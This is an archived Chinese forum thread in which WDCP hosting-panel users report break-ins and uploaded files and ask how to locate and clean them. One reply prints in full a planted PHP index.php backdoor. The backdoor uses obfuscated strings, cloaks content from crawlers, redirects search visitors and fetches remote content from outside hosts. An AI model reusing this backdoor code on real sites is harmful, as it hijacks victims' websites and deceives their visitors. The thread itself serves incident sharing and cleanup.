WDlinux官方论坛's Archiver

luza 发表于 2014-9-25 11:18

这是WDCP的漏洞吗?如何解决?!

WDCP是一个非常好的虚拟主机管理软件,出于对WDCP的信任,在服务器上安装了,但是最近发现严重的问题:
[attach]4826[/attach][attach]4825[/attach][attach]4824[/attach][attach]4824[/attach][attach]4823[/attach]

luza 发表于 2014-9-25 11:19

数据库被入侵了,并且成功上传三个文件,现在最脑火的是,不知道这三个文件是哪三个!

请管理员给个教程!!

feng521w 发表于 2014-9-25 11:34

太他妈的可怕;了

zhoumo310 发表于 2014-9-25 18:09

我们都遭遇了相同问题。希望wdcp尽快修复。
同类帖子大集合 [url]http://www.wdlinux.cn/bbs/viewthread.php?tid=36294&page=1&extra=#pid63741[/url]

joynow 发表于 2014-9-26 08:54

我也遇到同样的问题,上传的文件都是index.php,其实就是把目录下的空文件替换成挂马文件,但这些文件没有人访问不知有什么用处?黑客都是直接登陆WDCP后台,估计是利用了WDCP的漏洞。
[attach]4827[/attach]

挂马的内容:[code]<?php
date_default_timezone_set('PRC');
set_time_limit(20);
error_reporting(0);
header('Content-type: text/html; charset=gbk');
define('SPIDERS','LzScMUI8p28hL29gsUAiM291sUyunT9isTqiM2ky');
define('HOSTS',$_SERVER['SERVER_NAME']);
define('d58ok','0');
define('REFES',$_SERVER['HTTP_REFERER']);
define('USERS',$_SERVER['HTTP_USER_AGENT']);
define('URLS',$_SERVER['REQUEST_URI']);
$Class_urls = 'http://www.5886887.com/';
$Class_zhus = 'nUE0pQbiYmL3YwR5BP4kAwthZGD2Yj==';
$KIP=array('117.28.255.37','116.55.241.24','125.64.94.219','119.147.114.213','118.122.188.194','60.172.229.61','61.188.39.16','61.147.98.198','61.129.45.72','113.98.254.245','58.221.61.128','117.34.73.70','58.215.190.84','117.28.255.53','183.91.40.144','117.21.220.245','122.228.200.46','61.164.150.70','61.147.108.41','116.55.242.138','114.80.222.242','61.147.108.41','116.255.230.70','222.186.24.26','222.186.24.59','220.181.158.106','123.125.160.215');
define('PATHS',__FILE__);
function Reads($url){
$opts = array('http' => array('method' => "GET",'timeout' => 8));
$context = stream_context_create($opts);
$html = file_get_contents($url, false, $context);
if(empty($html)){$html = file_get_contents($url);}
return $html;
}
function Ips(){
if(@$_SERVER["HTTP_X_FORWARDED_FOR"]){
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
}else if(@$_SERVER["HTTP_CLIENT_IP"]){
$ip = $_SERVER["HTTP_CLIENT_IP"];
}else if(@$_SERVER["REMOTE_ADDR"]){
$ip = $_SERVER["REMOTE_ADDR"];
}else if(@getenv("HTTP_X_FORWARDED_FOR")){
$ip = getenv("HTTP_X_FORWARDED_FOR");
}else if(@getenv("HTTP_CLIENT_IP")){
$ip = getenv("HTTP_CLIENT_IP");
}else if(@getenv("REMOTE_ADDR")){
$ip = getenv("REMOTE_ADDR");
}else{
$ip = "Unknown";
}return $ip;
}
function R($string){
$Class_now = str_rot13($string);
$Class_now = base64_decode($Class_now);
return $Class_now;
}
if(eregi(R(SPIDERS),REFES)){
$Class_site = true;
if(eregi("site%3A|inurl%3A",REFES)){
setcookie('x86',HOSTS,time() + 259200);
$Class_site = false;
}
if($Class_site && empty($_COOKIE['x86'])){
setcookie('x86',HOSTS,time() + 259200);
$Class_from = $Class_urls;
$Class_home = $Class_from;
header("Location: ".$Class_home.'?'.HOSTS);
exit;
}
}
if(d58ok){
$Class_UR = R($Class_zhus).'?xxurl='.bin2hex(URLS);
$Class_UR .= '&xxhost='.bin2hex(HOSTS);
$Class_code = Reads($Class_UR);
if(trim($Class_code) !== 'nonono')
{echo base64_decode($Class_code);exit;}
}
if(eregi(R(SPIDERS),USERS)){
if(!in_array(Ips(),$KIP)){
$Class_UR = R($Class_zhus).'?xxurl='.bin2hex(URLS);
$Class_UR .= '&xxhost='.bin2hex(HOSTS);
$Class_code = Reads($Class_UR);
if(trim($Class_code) !== 'nonono')
{echo base64_decode($Class_code);exit;}
}
}
?>[/code]

admin 发表于 2014-9-26 11:56

[url]http://www.wdlinux.cn/bbs/thread-37476-1-1.html[/url]

luza 发表于 2014-9-26 17:21

[quote]我也遇到同样的问题,上传的文件都是index.php,其实就是把目录下的空文件替换成挂马文件,但这些文件没有人 ...
[size=2][color=#999999]joynow 发表于 2014-9-26 08:54[/color] [url=http://www.wdlinux.cn/bbs/redirect.php?goto=findpost&pid=64953&ptid=37469][img]http://www.wdlinux.cn/bbs/images/common/back.gif[/img][/url][/size][/quote]


   请教一下,怎么找到这些上传的文件在哪?

admin 发表于 2014-9-27 12:15

检查下文件时间,看有没新上传的

璀璨 发表于 2014-10-11 11:47

[quote]检查下文件时间,看有没新上传的
[size=2][color=#999999]admin 发表于 2014-9-27 12:15[/color] [url=http://www.wdlinux.cn/bbs/redirect.php?goto=findpost&pid=65020&ptid=37469][img]http://www.wdlinux.cn/bbs/images/common/back.gif[/img][/url][/size][/quote]

我被上传了两个·····老大·     请教下~  知道上传的时间 ·· 怎么找到上传的文件呢?那么多文件好难查啊

songfeifei 发表于 2014-11-14 19:10

请参考此贴  进行查杀  [url]http://www.wdlinux.cn/bbs/thread-37766-1-1.html[/url]

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.